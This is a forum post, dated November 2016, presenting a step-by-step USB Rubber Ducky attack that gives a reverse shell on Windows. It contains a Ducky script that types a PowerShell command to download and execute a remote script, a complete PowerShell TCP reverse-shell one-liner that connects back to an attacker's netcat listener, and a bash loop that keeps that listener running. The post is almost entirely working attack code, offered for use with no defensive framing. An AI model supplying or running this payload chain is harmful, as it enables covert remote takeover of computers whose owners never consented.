How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky

Post by jamied_uk on 3rd November 2016, 10:04

The Ducky Script
DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"
Replace the URL above with the address of your web server where we’ll be hosting the powershell reverse shell script.
HTTPS is highly encouraged for the web server. See Hak5 episode 2023 for a video tutorial on setting up a free Let’s Encrypt SSL certificate.
This very short USB Rubber Ducky payload simply opens the Windows run dialog, types in a single line of powershell and runs it. This powershell snippet will download and execute whatever other powershell script we host on our web server.
The Web Server
On our web server we’ll need to host the powershell reverse shell code. This powershell TCP one liner from Nishang works great:
$sm=(New-Object Net.Sockets.TCPClient("hostofnetcatlistener",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
There are many more powerful reverse shells as part of the Nishang suite – but this one serves our example well. Host it on your web server as referenced by the ducky script above. Be sure to change the host and port in the code above to match that of your netcat listener.
The Netcat Listener
Now that we have our USB Rubber Ducky payload written and our powershell reverse shell code hosted on our web server we’re ready to setup the listener. A simple netcat -lp 4444 from our publicly accessible server referenced in the powershell above will do fine in this case.
To keep our netcat listener running even after a shell terminates we might want to wrap it in a simple bash loop.
while true; do nc -l -p 4444; done

